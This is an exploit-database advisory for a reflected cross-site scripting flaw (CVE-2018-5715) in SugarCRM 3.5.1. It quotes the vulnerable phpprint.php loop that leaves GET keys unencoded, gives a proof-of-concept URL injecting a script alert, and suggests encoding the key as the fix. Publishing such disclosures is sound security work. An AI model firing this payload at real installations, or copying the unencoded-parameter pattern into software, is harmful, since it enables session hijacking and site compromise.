header-logo
Suggest Exploit
vendor:
SugarCRM
by:
Guilherme Assmann
6.1
CVSS
MEDIUM
Cross-site Scripting (XSS)
79
CWE
Product Name: SugarCRM
Affected Version From: 3.5.1
Affected Version To: 3.5.1
Patch Exists: YES
Related CWE: CVE-2018-5715
CPE: a:sugarcrm:sugarcrm:3.5.1
Other Scripts: N/A
Platforms Tested: Kali Linux, Windows 7, 8.1, 10, Ubuntu - Firefox
2017

sugarCRM 3.5.1 XSS refeclted

The vulnerability is in the key parameter of phpprint.php. The $key variable is not encoded, which allows for easy XSS exploitation. The proof of concept is http://vulnerable/index.php?action=Login&module=Users&print=a&"/><script>alert('xss')</script>

Mitigation:

Encode the $key variable in phpprint.php.
Source

Exploit-DB raw data:

# Exploit Title: sugarCRM 3.5.1 XSS refeclted
# Date: 16/01/2017
# Exploit Author: Guilherme Assmann
# Vendor Homepage: https://www.sugarcrm.com/
# Version: 3.5.1
# Tested on: kali linux, windows 7, 8.1, 10, ubuntu - Firefox
# Download https://sourceforge.net/projects/sugarcrm/files/SugarCRM%20Release%20Archive/Sugar%20Suite%203.5.1/
# CVE: CVE-2018-5715
More informations: https://m4k4br0.github.io/sugarcrm-xss/

The vulnerability are in the key parameter of phpprint.php

32 foreach ($_GET as $key => $val) {
33   if ($key != "print") {
34     if (is_array($val)) {
35       foreach ($val as $k => $v) {
36         $query_string .= "{$key}[{$k}]=" . urlencode($v) . "&";
37       }
38     }
39     else {
40       $query_string .= "{$key}=" . urlencode($val) . "&";
41     }
42   }
43 }

the $key variable are not encoded, this permit that XSS more easy
---------------------------------------------------------------------
Poc:
http://vulnerable/index.php?action=Login&module=Users&print=a&"/><script>alert('xss')</script>